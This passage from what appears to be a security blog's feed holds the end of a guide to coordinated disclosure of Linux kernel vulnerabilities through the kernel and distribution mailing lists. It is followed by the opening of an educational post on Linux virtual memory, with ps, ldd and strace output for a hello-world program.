<p>Before we dive into the process proper, it&rsquo;s worth highlighting some important context and disclaimers around the nature of this post:</p>
<ol>
<li>First and foremost, this is advice <strong>based on my personal experience</strong> and that of the community members I interacted with. One thing worth knowing is that the open-source community is not a hive mind, so opinions will differ![1]</li>
<li>On the topic of personal experience, this is written from the <strong>perspective of a zoomer</strong> who was born in 1997 and whose prior experience with email was limited to using Gmail for Steam 2FA</li>
<li>Finally, there are <strong>different routes for reporting/disclosing</strong> based on the nature of the bug. In this case I&rsquo;m specifically referring to <strong>unpatched</strong> vulnerabilities within the Linux kernel; where in this instance by vulnerability, I am referring to a &ldquo;<strong>sensitive bug</strong>&rdquo; that could lead to privilege escalations, facilitate PE (KASLR/canary leaks), remote DoS etc.</li>
</ol>
<hr>
<ol>
<li>That being said, I hope the majority of the content of this post has some objective value (otherwise RIP my Saturday morning spent on this)</li>
</ol>
<h2 id="initial-preparation">Initial Preparation</h2>
<p><img src="https://sam4k.com/content/images/2022/02/confident_in_prep.gif" alt=""></p>
<p>Okay, now that we&rsquo;ve laid the groundwork and set some context - let&rsquo;s get stuck into how we&rsquo;re gonna go about disclosing this crazy kernel vuln we&rsquo;ve just found! Well, after we make sure we&rsquo;re ready to disclose this crazy kernel vuln &hellip; it is a crazy kernel vuln right?[1]</p>
<p>The more information and understanding you go into the disclosure process with and are able to share, the easier the job is for everyone involved.</p>
<p>Understandably, you don&rsquo;t want to spend years sat on an 0day to the point you&rsquo;re able to rewrite the whole subsystem blindfolded, but consider the following:</p>
<ul>
<li>What is the impact of the vulnerability? Does it lead to privilege escalation? Is it remotely reachable? Is it trivial or difficult to exploit?</li>
<li>What kernel versions are affected? What commit was the vulnerability introduced in?</li>
<li>What part of the kernel is affected? Is it in the core kernel, a networking module?</li>
<li>Is this vulnerability reachable in most configurations, or only in specific environments/use cases? What distributions are affected?</li>
<li>How would you fix the vulnerability? Are there existing mitigations?</li>
</ul>
<hr>
<ol>
<li>If you find yourself in this position and doubting yourself, it&rsquo;s okay, me too :) In fact it wasn&rsquo;t until my CVE was assigned that I thought &ldquo;Huh, it is legit after all&rdquo;; the best solution is to harness this doubt into thorough testing, research and notes to prove yourself right (or wrong about being wrong?)</li>
</ol>
<h2 id="the-disclosure-process">The Disclosure Process</h2>
<p>It&rsquo;s time. We&rsquo;ve put in the work, verified our findings and got a solid understanding of the vulnerability&hellip; so, uh, who do we tell? Good question!</p>
<blockquote>
<p><strong>coordinated vulnerability disclosure</strong>, or &ldquo;CVD&rdquo; (formerly known as responsible disclosure)<a href="https://en.wikipedia.org/wiki/Coordinated_vulnerability_disclosure#cite_note-:0-1">[1]</a> is a <a href="https://en.wikipedia.org/wiki/Vulnerability_disclosure">vulnerability disclosure</a> model in which a vulnerability or an issue is disclosed to the public only after the responsible parties have been allowed sufficient time to <a href="https://en.wikipedia.org/wiki/Patch_(computing)">patch</a> or remedy the vulnerability or issue. — Wikipedia</p>
</blockquote>
<p>CVD for the Linux kernel is handled, in typical Linux fashion, over <a href="https://en.wikipedia.org/wiki/Mailing_list#:~:text=A%20mailing%20list%20is%20a,or%20simply%20%22the%20list%22.">mailing lists</a>. There&rsquo;s a few different mailing lists out there, but in particular we&rsquo;re interested in the following:</p>
<ul>
<li><a href="https://www.kernel.org/doc/html/latest/admin-guide/security-bugs.html">security@kernel.org</a>[1]: private list for the Linux kernel security team, who will help verify the bug &amp; facilitate a fix as part of the <strong>initial embargoed disclosure</strong></li>
<li><a href="https://oss-security.openwall.org/wiki/mailing-lists/distros">linux-distros@vs.openwall.org</a>: private list of security contacts for various Linux distributions, used as a channel to notify distributions of &ldquo;non-public medium or high severity security issues&rdquo; as part of the <strong>initial embargoed disclosure</strong></li>
<li><a href="https://oss-security.openwall.org/wiki/mailing-lists/oss-security">oss-security@lists.openwall.com</a>: public list which anyone can subscribe to, for &ldquo;public discussion of security flaws, concepts, and practices in the Open Source community&rdquo; and used for <strong>public disclosure</strong> of security vulns</li>
</ul>
<hr>
<ol>
<li>It&rsquo;s worth noting that when Googling terms such as &ldquo;linux vulnerability disclosure&rdquo;, the top kernel doc result is actually for v4.10 and contains less information than the latest versions; this can be fixed by adjusting the URL or going <a href="https://www.kernel.org/doc/html/latest/admin-guide/security-bugs.html">here</a></li>
</ol>
<h3 id="0x00-an-overview">0x00 An Overview</h3>
<p>Before diving into the specifics, below is a quick summary of what the disclosure process will typically look like:</p>
<ol>
<li>Notify <strong><a href="mailto:security@kernel.org">security@kernel.org</a></strong>, <strong><a href="mailto:linux-distros@vs.openwall.org">linux-distros@vs.openwall.org</a></strong> and relevant maintainers of the vulnerability; establishing details, embargo period, CVE request and possible fix</li>
<li>Discussion ensues and ideally a fix is settled on and the affected parties/distributions are kept in the loop</li>
<li>At the end of the embargo period the patch is committed upstream, <strong><a href="mailto:oss-security@lists.openwall.com">oss-security@lists.openwall.com</a></strong> is notified, CVE descriptions are made public, tweets are made etc.</li>
<li>If proof-of-concept code is to be published, this is ideally done several days after to give people time to patch their kernels / apply updates</li>
</ol>
<h3 id="0x01-first-contact">0x01 First Contact</h3>
<p><img src="https://sam4k.com/content/images/2022/02/imready.gif" alt=""></p>
<p>Alright, finally! We&rsquo;ve got all the details covered, now we just need to send an email to <a href="https://www.kernel.org/doc/html/latest/admin-guide/security-bugs.html">security@kernel.org</a> and <a href="https://oss-security.openwall.org/wiki/mailing-lists/distros">linux-distros@vs.openwall.org</a> right? WRONG!</p>
<p>Well, technically right, but there&rsquo;s a few crucial details we need to make sure of first, unless you want to stumble your way onto the scene like yours truly.</p>
<p>I&rsquo;ve linked each of the relevant emails to their respective pages, which outline mailing list usage and any requirements. There&rsquo;s a lot of information and sometimes it&rsquo;s conflicting, as &ldquo;linux kernel vuln&rdquo; disclosure is only a subset of what these lists are used for.</p>
<p>❗</p>
<p>Going forward I may refer to the lists by shorthand as <a href="mailto:s@k.o">s@k.o</a> and linux-distros.</p>
<p>So to cut short a long and embarrassing saga of trial and error on my part, here&rsquo;s a distilled collection of the relevant requirements and advice learned:</p>
<ul>
<li>Initial disclosure should be sent to linux-distros, CC&rsquo;ing <a href="mailto:s@k.o">s@k.o</a> along with any relevant subsystem maintainers<a href="https://www.kernel.org/doc/html/latest/process/maintainers.html">[1]</a></li>
<li>The email should be sent in <strong>plaintext</strong>; here that refers to the email format (i.e. no rich-text emails with fancy HTML and stuff) and not just the fact that it&rsquo;s <strong>not encrypted</strong></li>
<li>The subject should be prefixed with <code>[vs]</code> to avoid the linux-distros spam filter, and the subject shouldn&rsquo;t contain any sensitive information RE the vulnerability</li>
<li>Propose a <em><strong>tentative</strong></em> public disclosure date &amp; time (e.g. 05/02/22 16:00 GMT). Ideally a date should be settled on after a fix is decided, but note the maximum embargo period for linux-distros is 14 days, regardless of whether there is a working fix</li>
<li>Include a request for a CVE to be assigned for the vulnerability</li>
<li>As mentioned, provide as much information and detail as necessary (no War &amp; Peace tho); if you have a fix, see the next section on how to format/include that correctly</li>
</ul>
<p>With all that in hand, you should be ready to make first contact and begin the coordinated disclosure of your Linux kernel vulnerability, awesome!</p>
<p><em>I was about to write my own War &amp; Peace on mail clients, but suffice to say the kernel docs provide some helpful information on recommended email clients and any necessary configuration required to get them to play nice.<a href="https://www.kernel.org/doc/html/latest/process/email-clients.html">[2]</a></em></p>
<hr>
<ol>
<li><a href="https://www.kernel.org/doc/html/latest/process/maintainers.html">https://www.kernel.org/doc/html/latest/process/maintainers.html</a></li>
<li><a href="https://www.kernel.org/doc/html/latest/process/email-clients.html">https://www.kernel.org/doc/html/latest/process/email-clients.html</a></li>
</ol>
<h3 id="0x02-patching-follow-up">0x02 Patching &amp; Follow Up</h3>
<p><img src="https://sam4k.com/content/images/2022/02/waiting.gif" alt=""></p>
<p>Did I CC the right maintainers?! Did my tabs come through on my patch?? Is this even the right mailing list???? - don&rsquo;t sweat it, the waiting game can be real.</p>
<p>If you don&rsquo;t hear back <strong>within 48 hours</strong> then make sure to follow up the initial email to confirm that it was received, as sometimes things can get lost in the mix.</p>
<p>The discussion that ensues will vary based on the amount of information initially supplied, but will likely focus around impact, mitigations and sorting out a fix.</p>
<h4 id="including-a-patch">Including a Patch</h4>
<p>&ldquo;<a href="https://www.kernel.org/doc/html/latest/process/submitting-patches.html">Submitting patches: the essential guide to getting your code into the kernel</a>&rdquo; is going to be your best friend here, covering almost everything you need to know.</p>
<p>The only difference is you&rsquo;ll just be including this inline within your disclosure email thread with <a href="mailto:s@k.o">s@k.o</a> and linux-distros; as opposed to a separate submission.</p>
<p>This is where the whole email client whitespace mangling comes into play, as the Linux kernel uses tabs for indentation and these should really be preserved in patch diffs.</p>
<p>Also, I&rsquo;m sure it goes without saying, but make sure you test any patches you submit and make this clear when you suggest a patch!</p>
<h3 id="0x03-public-disclosure">0x03 Public Disclosure</h3>
<p><img src="https://sam4k.com/content/images/2022/02/no_autographs.gif" alt=""></p>
<p>The finishing line is in sight now, you can almost see the retweets, as the embargo period comes to an end. There&rsquo;s not much to cover here, so I&rsquo;ll keep it brief:</p>
<ul>
<li>Hopefully a patch has been finalised and the upstream fix can now be disclosed</li>
<li>You can request linux-distros to make the CVE details public</li>
<li>You should send an advisory out to <a href="https://oss-security.openwall.org/wiki/mailing-lists/oss-security">oss-security@lists.openwall.com</a>; see their wiki for more info, but content will be similar to your initial report to linux-distros[1]</li>
<li>If you plan to publish exploit code, mention this in the initial public advisory, but ideally wait several days for users to update their systems</li>
</ul>
<p>And that&rsquo;s it! It&rsquo;s over! Now you can go back to the easy part and find some more vulns!</p>
<hr>
<ol>
<li>Here are some examples of public advisories from <a href="https://seclists.org/oss-sec/2022/q1/80">Qualys</a> &amp; <a href="https://seclists.org/oss-sec/2022/q1/99">grsec</a></li>
</ol>
<h2 id="wrapping-up">Wrapping Up</h2>
<p>Hopefully this post has given some insight into a particularly niche subset of coordinated disclosure practice and can provide some help to people who find themselves in a similar position as I did recently!</p>
<p>Admittedly, the process was rather daunting to go into with the self-imposed pressure of wanting to disclose a new vulnerability, complete inexperience with mailing lists and figuring out the relevant processes and requirements which applied to my situation.</p>
<p>That said, it was also extremely rewarding to be able to contribute back to the Linux community and be able to facilitate a fix for something like this. There may have been more than a little bit of fan-boying while interacting with people I&rsquo;ve followed for a long time, even if they were schooling me on mailing list 101s.</p>
<p>Despite fumbling my way through the process, everyone was helpful and patient, though maybe with this post you can avoid some of the same fumbling.</p>
<p>exit(0);</p>
]]></content:encoded></item><item><title>Linternals: Introducing Virtual Memory</title><description>Alright, let&amp;#39;s get stuck into some Linternals! As the title suggests, this post will be exploring the ins and outs of virtual memory with regards to modern Linux systems.</description><link>https://sam4k.com/linternals-virtual-memory-part-1/</link><guid isPermaLink="false">61cdb1b7484d4d42c8e4a675</guid><category>linux</category><category>kernel</category><category>memory</category><dc:creator>sam4k</dc:creator><pubDate>Sat, 15 Jan 2022 21:00:00 +0000</pubDate><media:content url="https://sam4k.com/content/images/2022/01/linternals.gif" medium="image"/><content:encoded><![CDATA[<p>Alright, let&rsquo;s get stuck into some Linternals! As the title suggests, this post will be exploring the ins and outs of virtual memory with regards to modern Linux systems.</p>
<p>I say Linux systems, but this topic, like many in this series, treads the line between examining the Linux kernel and the hardware it runs on, but who cares, it&rsquo;s still interesting right? And I guess it is one of the fundamental building blocks of modern systems too&hellip;</p>
<p>That said, I&rsquo;ll try to avoid getting too stuck into the nitty-gritty of hardware specifics where possible (no promises though!), so forgive any gross oversimplifications for what can be a deceptively complex topic.</p>
<p>In this part I&rsquo;ll lay the groundwork by covering some fundamentals such as the differences between physical and virtual memory, the virtual address space and how user-mode and the kernel interact with this virtual address space.</p>
<p>In a later part (or parts, given my track record), we&rsquo;ll dive a bit deeper and look into how this is implemented and the ways we can really take advantage of virtual memory.</p>
<h2 id="contents">Contents</h2>
<ul>
<li><a href="#0x01-what-is-virtual-memory">0x01 What IS Virtual Memory?</a>
<ul>
<li><a href="#physical-memory">Physical Memory</a></li>
<li><a href="#queue-virtual-memory">Cue Virtual Memory</a></li>
</ul>
</li>
<li><a href="#0x02-the-virtual-address-space">0x02 The Virtual Address Space</a>
<ul>
<li><a href="#lets-touch-on-addressing-hexadecimal">Let&rsquo;s Touch on Addressing &amp; Hexadecimal</a></li>
<li><a href="#thats-a-big-vas">That&rsquo;s a Big VAS</a></li>
<li><a href="#vas-overview">VAS Overview</a>
<ul>
<li><a href="#advantages-of-virtual-memory">Advantages of Virtual Memory</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#0x03-the-vm-split">0x03 The VM Split</a>
<ul>
<li><a href="#about-processes">About Processes</a></li>
<li><a href="#user-mode-kernel-mode">User-mode &amp; Kernel-mode</a></li>
<li><a href="#queue-the-vm-split">Queue The VM Split!</a></li>
</ul>
</li>
<li><a href="#next-time">Next Time!</a></li>
</ul>
<h2 id="0x01-what-is-virtual-memory">0x01 What IS Virtual Memory?</h2>
<p>Virtual memory, every compsci student knows what virtual memory is right, it&rsquo;s uh, virtual memory, you know, memory that&rsquo;s not physical? Yeah, I&rsquo;m realising it can be a bit fiddly to describe virtual memory in a succinct and intuitive way.</p>
<p><img src="https://sam4k.com/content/images/2022/01/areyouready.gif" alt=""></p>
<h3 id="physical-memory">Physical Memory</h3>
<p>Let&rsquo;s start with what virtual memory <em><strong>ISN&rsquo;Tish</strong></em>, and that&rsquo;s physical! The term &ldquo;physical memory&rdquo; typically refers to your system&rsquo;s RAM (random-access memory). This is the volatile memory your operating system uses for all things transient.</p>
<p>While having your memory cleared when your system is powered-off[1] may seem inconvenient, RAM&rsquo;s speed makes it ideal for use-cases where volatility doesn&rsquo;t matter.</p>
<p>Keeping this brief, there&rsquo;s actually a lot of use-cases for RAM. Like, a lot. The software you&rsquo;re using to view this post? Loaded into and running in RAM. The operating system running that software? Loaded into and running in RAM.</p>
<p>Often we say how a program is &ldquo;loaded into memory&rdquo; and yes, you guessed it, this ubiquitous &ldquo;memory&rdquo; and RAM AKA physical memory are all one-and-the-same. We use non-volatile storage such as SSDs and HDDs to store our kernel, binaries, configs and stuff and then when we need to use them, they&rsquo;re loaded into the much faster RAM for use.</p>
<p>You may also hear RAM referred to as primary memory and SSDs &amp; HDDs as secondary memory.</p>
<ol>
<li>Unless&hellip; <a href="http://citpsite.s3-website-us-east-1.amazonaws.com/oldsite-htdocs/pub/coldboot.pdf">here&rsquo;s a paper</a> from the 2008 USENIX Security Symposium about recovering data from RAM</li>
</ol>
<h3 id="queue-virtual-memory">Cue Virtual Memory</h3>
<p>Okay, so now we have a general grasp of physical memory and the integral role it plays, it&rsquo;s time to introduce the titular virtual memory!</p>
<p>As we alluded to above, basically everything wants a piece of RAM. Using <code>ps</code> we can see just how many processes are vying for a slice of our precious RAM:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">$ ps -e --no-headers | wc -l
</span></span><span class="line"><span class="cl">404
</span></span></code></pre></div><p>And if anyone has ever looked into building or upgrading a PC, they&rsquo;ll know that GB for GB, RAM is a lot more expensive than its non-volatile counterparts.</p>
<p><img src="https://sam4k.com/content/images/2022/01/needmoremem-1.gif" alt=""></p>
<p>Not to mention, as the &ldquo;random-access&rdquo; implies, systems are able to access any memory location in physical memory directly, meaning things can get chaotic real fast if every process is trying to find and manage which bits of memory are up for grabs.</p>
<p>Cue virtual memory: a means to abstract processes away from the low level organisation of physical memory (this burden is passed to the kernel) by providing a Virtual Address Space.</p>
<h2 id="0x02-the-virtual-address-space">0x02 The Virtual Address Space</h2>
<p>Sweet, so the Virtual Address Space (VAS) provides a physical memory abstraction for processes to use by shifting the burden of managing low level organisation to the kernel! Cool cool &hellip; so, uh, how exactly?</p>
<p>Instead of having processes (and by extension their programmers) deal with accessing and managing physical memory directly, using virtual memory provides <strong>each process with its own</strong> virtual address space.</p>
<p>This virtual address space represents the range of all <strong>addressable physical memory</strong>. Let&rsquo;s unpack that for a second. Not all free RAM, or even all the RAM you have installed in your computer, but all the possible physical memory your computer <strong>could</strong> address if it had it.</p>
<p>Modern 64-bit systems can handle 64 bits of data at a time. This means on typical 64-bit architectures, like x86_64 and aarch64, pointers to memory can be 64 bits long. So, theoretically speaking, we can have up to 2<sup>64</sup> different addresses[1].</p>
<p>This means our virtual address space on a 64-bit system ranges from <code>0x0 - 0xffffffffffffffff</code>. That&rsquo;s a lot of bytes!</p>
<ol>
<li>For anyone wondering about this value, a &ldquo;bit&rdquo; is a binary value, it can be a 0 or 1. So 64 of them can represent 2<sup>64</sup> different values</li>
</ol>
<h3 id="lets-touch-on-addressing-hexadecimal">Let&rsquo;s Touch on Addressing &amp; Hexadecimal</h3>
<p>Some of you will notice that I wrote the address in hexadecimal (hex), which is a base 16 number system; tl;dr being each digit can take 16 values (0-9, then a-f) instead of 10 before a second digit is needed.</p>
<p>We use hexadecimal over decimal because, as a base 16 system, it lines up perfectly with the binary (base 2) system that forms the foundation of computer architecture and, as a result, all manner of digital data representation.</p>
<p>The reason hexadecimal &ldquo;lines up perfectly&rdquo; is that 16 is a power of 2; 2<sup>4</sup> specifically, which basically means that 1 hex digit can perfectly represent any 4 binary digits, 2 hex digits can represent 8 binary digits (a byte) and so on. Whereas decimal simply doesn&rsquo;t align like this.</p>
<p><img src="https://sam4k.com/content/images/2022/01/mathematical.gif" alt=""></p>
<p>So for things like memory, which is often byte-addressable, hexadecimal provides a more readable and information dense alternative to using binary.</p>
<h3 id="thats-a-big-vas">That&rsquo;s a Big VAS</h3>
<p>Back to the VAS, some of you might have clocked that <code>0xffffffffffffffff</code> is an awful lot of bytes, right? Yep, unless you have 2<sup>64</sup> bytes AKA ~18.4 Exabytes AKA ~18.4 million Terabytes, then we&rsquo;re clearly addressing far more memory than we have on our primary and secondary memory combined! And for each process?! What gives?</p>
<p>First and foremost, remember, this is a <strong>virtual</strong> address space provided to processes. The reality is the majority of this address space will go unused. For virtual memory to actually be used, and take up space, the virtual address has to be mapped to some physical address.</p>
<p>Mapped?? For virtual memory to be used by a process it first needs to be <strong>mapped</strong> to a physical address, where the data actually resides. It&rsquo;s the kernel&rsquo;s job to handle this and manage the bookkeeping for memory management.</p>
<p>At one point or another, the virtual memory address needs to be translated to the physical address where the data is actually located; this process is called address translation. You bet we&rsquo;ll be looking into that some more later!</p>
<p>But let&rsquo;s use this moment to remind ourselves that <em><strong>each process has its own virtual address space</strong></em>. So effectively, each process lives in a sandbox, believing it has unfettered access to addresses <code>0x0 - 0xffffffffffffffff</code>. Processes are not aware of, or able to access, the virtual address space of another process.</p>
<p><img src="https://sam4k.com/content/images/2022/01/addresstrans_basic-3.png" alt=""></p>
<p>Drastically oversimplified view of how two processes can use the same virtual address, which translates to a different physical address for each.</p>
<p>So this means that process 1 &amp; process 2 could make use of the same virtual address in their respective virtual address space, however these would both be translated by the kernel to two DIFFERENT physical addresses. Still following?</p>
<h3 id="vas-overview">VAS Overview</h3>
<p>So to summarise what we&rsquo;ve learned so far: each process running on a Linux system has its own virtual address space. This VAS can span the entire addressable space for that architecture, however virtual addresses are only used after they have been mapped by the kernel to a physical address, i.e. they are actually taking up some space in physical memory.</p>
<p>It&rsquo;s the kernel&rsquo;s role to do all the bookkeeping and lower-level memory organisation around translating this virtual address to the actual physical address[1].</p>
<p>This way, processes and their programmers don&rsquo;t need to concern themselves with any low-level memory organisation or even worry about other processes, they just have to interact with this broad VAS and the kernel will handle the rest.</p>
<h4 id="advantages-of-virtual-memory">Advantages of Virtual Memory</h4>
<p>Given the above, one of the most obvious advantages of virtual memory is that it takes a lot of the burden off of programmers with regards to memory management.</p>
<p>However, as we&rsquo;ll touch on more later, using a virtual memory scheme affords us several other important advantages as well:</p>
<ul>
<li>It allows the kernel, behind the scenes, to actually map virtual addresses to <strong>secondary memory</strong> (SSDs &amp; HDDs). This allows us to map less used/important[2] data to the slower secondary memory and free up our scarce RAM for data that needs it.</li>
<li>The address translation process and abstraction of physical memory allows us to implement additional features, notably security related ones, to our memory management</li>
</ul>
<ol>
<li>I say &ldquo;around translating&rdquo; as technically the actual address translation is done at a lower level, by the CPU</li>
<li>Another gross simplification, we might touch later on the metrics behind these decisions</li>
</ol>
<h2 id="0x03-the-vm-split">0x03 The VM Split</h2>
<p>Okay, let&rsquo;s explore a little more how the virtual address space is used in Linux, as it&rsquo;s not just a matter of throwing an 18EB address space at a user process and saying have at it!</p>
<h3 id="about-processes">About Processes</h3>
<p>I realised I&rsquo;m throwing around the term process left and right, and while I want to remain focused on the topic at hand, I&rsquo;ll just touch briefly on what a process is in Linux.</p>
<p>Simply, a process is a running instance of a program[1]. Nowadays, programs can get pretty complex and, thanks to the advances of programming languages and library support, the burden of managing this complexity is eased.</p>
<p>However, even the most simple &ldquo;Hello, World!&rdquo; program in C requires loading shared libraries which in turn need to interact with the kernel to get things done.</p>
<p>Don&rsquo;t believe me? Take the basic C program below:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">   <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Hello, World!</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">   <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p>With a few commands, we can get a quick insight into what&rsquo;s going on behind the scenes:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">$ ldd hw
</span></span><span class="line"><span class="cl">        linux-vdso.so.1 (0x00007ffecb53e000)
</span></span><span class="line"><span class="cl">        libc.so.6 =&gt; /usr/lib/libc.so.6 (0x00007fc3747f3000)
</span></span><span class="line"><span class="cl">        /lib64/ld-linux-x86-64.so.2 =&gt; /usr/lib64/ld-linux-x86-64.so.2 (0x00007fc3749f3000)
</span></span></code></pre></div><p><code>ldd</code> prints the shared object (shared library) dependencies required by our dynamically linked <code>hw</code> binary (compiled from <code>hw.c</code>). In our context, this means when we map our program into its virtual address space, we&rsquo;ve also got to map any necessary dependencies too.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-gdscript3" data-lang="gdscript3"><span class="line"><span class="cl"><span class="o">$</span> <span class="n">strace</span> <span class="o">./</span><span class="n">hw</span>
</span></span><span class="line"><span class="cl"><span class="n">execve</span><span class="p">(</span><span class="s2">&#34;./hw&#34;</span><span class="p">,</span> <span class="p">[</span><span class="s2">&#34;./hw&#34;</span><span class="p">],</span> <span class="mh">0x7ffd3ee6c190</span> <span class="o">/*</span> <span class="mi">62</span> <span class="n">vars</span> <span class="o">*/</span><span class="p">)</span> <span class="o">=</span> <span class="mi">0</span>
</span></span><span class="line"><span class="cl"><span class="n">brk</span><span class="p">(</span><span class="n">NULL</span><span class="p">)</span>                               <span class="o">=</span> <span class="mh">0x563a56b24000</span>
</span></span><span class="line"><span class="cl"><span class="n">arch_prctl</span><span class="p">(</span><span class="mh">0x3001</span> <span class="o">/*</span> <span class="n">ARCH_</span><span class="err">???</span> <span class="o">*/</span><span class="p">,</span> <span class="mh">0x7fff70afecc0</span><span class="p">)</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span> <span class="n">EINVAL</span> <span class="p">(</span><span class="n">Invalid</span> <span class="n">argument</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">access</span><span class="p">(</span><span class="s2">&#34;/etc/ld.so.preload&#34;</span><span class="p">,</span> <span class="n">R_OK</span><span class="p">)</span>      <span class="o">=</span> <span class="o">-</span><span class="mi">1</span> <span class="n">ENOENT</span> <span class="p">(</span><span class="n">No</span> <span class="n">such</span> <span class="n">file</span> <span class="ow">or</span> <span class="n">directory</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">openat</span><span class="p">(</span><span class="n">AT_FDCWD</span><span class="p">,</span> <span class="s2">&#34;/etc/ld.so.cache&#34;</span><span class="p">,</span> <span class="n">O_RDONLY</span><span class="o">|</span><span class="n">O_CLOEXEC</span><span class="p">)</span> <span class="o">=</span> <span class="mi">3</span>
</span></span><span class="line"><span class="cl"><span class="n">newfstatat</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="s2">&#34;&#34;</span><span class="p">,</span> <span class="p">{</span><span class="n">st_mode</span><span class="o">=</span><span class="n">S_IFREG</span><span class="o">|</span><span class="mi">0644</span><span class="p">,</span> <span class="n">st_size</span><span class="o">=</span><span class="mi">180840</span><span class="p">,</span> <span class="o">...</span><span class="p">},</span> <span class="n">AT_EMPTY_PATH</span><span class="p">)</span> <span class="o">=</span> <span class="mi">0</span>
</span></span><span class="line"><span class="cl"><span class="n">mmap</span><span class="p">(</span><span class="n">NULL</span><span class="p">,</span> <span class="mi">180840</span><span class="p">,</span> <span class="n">PROT_READ</span><span class="p">,</span> <span class="n">MAP_PRIVATE</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="o">=</span> <span class="mh">0x7f9ab51e1000</span>
</span></span><span class="line"><span class="cl"><span class="n">close</span><span class="p">(</span><span class="mi">3</span><span class="p">)</span>                                <span class="o">=</span> <span class="mi">0</span>
</span></span><span class="line"><span class="cl"><span class="n">openat</span><span class="p">(</span><span class="n">AT_FDCWD</span><span class="p">,</span> <span class="s2">&#34;/usr/lib/libc.so.6&#34;</span><span class="p">,</span> <span class="n">O_RDONLY</span><span class="o">|</span><span class="n">O_CLOEXEC</span><span class="p">)</span> <span class="o">=</span> <span class="mi">3</span>
</span></span><span class="line"><span class="cl"><span class="n">read</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="s2">&#34;</span><span class="se">\177</span><span class="s2">ELF</span><span class="se">\2\1\1\3\0\0\0\0\0\0\0\0\3\0</span><span class="s2">&gt;</span><span class="se">\0\1\0\0\0</span><span class="s2">`|</span><span class="se">\2\0\0\0\0\0</span><span class="s2">&#34;</span><span class="o">...</span><span class="p">,</span> <span class="mi">832</span><span class="p">)</span> <span class="o">=</span> <span class="mi">832</span>
</span></span><span class="line"><span class="cl"><span class="n">pread64</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="s2">&#34;</span><span class="se">\6\0\0\0\4\0\0\0</span><span class="s2">@</span><span class="se">\0\0\0\0\0\0\0</span><span class="s2">@</span><span class="se">\0\0\0\0\0\0\0</span><span class="s2">@</span><span class="se">\0\0\0\0\0\0\0</span><span class="s2">&#34;</span><span class="o">...</span><span class="p">,</span> <span class="mi">784</span><span class="p">,</span> <span class="mi">64</span><span class="p">)</span> <span class="o">=</span> <span class="mi">784</span>
</span></span><span class="line"><span class="cl"><span class="n">pread64</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="s2">&#34;</span><span class="se">\4\0\0\0</span><span class="s2">@</span><span class="se">\0\0\0\5\0\0\0</span><span class="s2">GNU</span><span class="se">\0\2\0\0\300\4\0\0\0\3\0\0\0\0\0\0\0</span><span class="s2">&#34;</span><span class="o">...</span><span class="p">,</span> <span class="mi">80</span><span class="p">,</span> <span class="mi">848</span><span class="p">)</span> <span class="o">=</span> <span class="mi">80</span>
</span></span><span class="line"><span class="cl"><span class="n">pread64</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="s2">&#34;</span><span class="se">\4\0\0\0\24\0\0\0\3\0\0\0</span><span class="s2">GNU</span><span class="se">\0</span><span class="s2">K@g7</span><span class="se">\5</span><span class="s2">w</span><span class="se">\10\300\344\306</span><span class="s2">B4Zp&lt;G&#34;</span><span class="o">...</span><span class="p">,</span> <span class="mi">68</span><span class="p">,</span> <span class="mi">928</span><span class="p">)</span> <span class="o">=</span> <span class="mi">68</span>
</span></span><span class="line"><span class="cl"><span class="n">newfstatat</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="s2">&#34;&#34;</span><span class="p">,</span> <span class="p">{</span><span class="n">st_mode</span><span class="o">=</span><span class="n">S_IFREG</span><span class="o">|</span><span class="mi">0755</span><span class="p">,</span> <span class="n">st_size</span><span class="o">=</span><span class="mi">2150424</span><span class="p">,</span> <span class="o">...</span><span class="p">},</span> <span class="n">AT_EMPTY_PATH</span><span class="p">)</span> <span class="o">=</span> <span class="mi">0</span>
</span></span><span class="line"><span class="cl"><span class="n">mmap</span><span class="p">(</span><span class="n">NULL</span><span class="p">,</span> <span class="mi">8192</span><span class="p">,</span> <span class="n">PROT_READ</span><span class="o">|</span><span class="n">PROT_WRITE</span><span class="p">,</span> <span class="n">MAP_PRIVATE</span><span class="o">|</span><span class="n">MAP_ANONYMOUS</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="o">=</span> <span class="mh">0x7f9ab51df000</span>
</span></span><span class="line"><span class="cl"><span class="n">pread64</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="s2">&#34;</span><span class="se">\6\0\0\0\4\0\0\0</span><span class="s2">@</span><span class="se">\0\0\0\0\0\0\0</span><span class="s2">@</span><span class="se">\0\0\0\0\0\0\0</span><span class="s2">@</span><span class="se">\0\0\0\0\0\0\0</span><span class="s2">&#34;</span><span class="o">...</span><span class="p">,</span> <span class="mi">784</span><span class="p">,</span> <span class="mi">64</span><span class="p">)</span> <span class="o">=</span> <span class="mi">784</span>
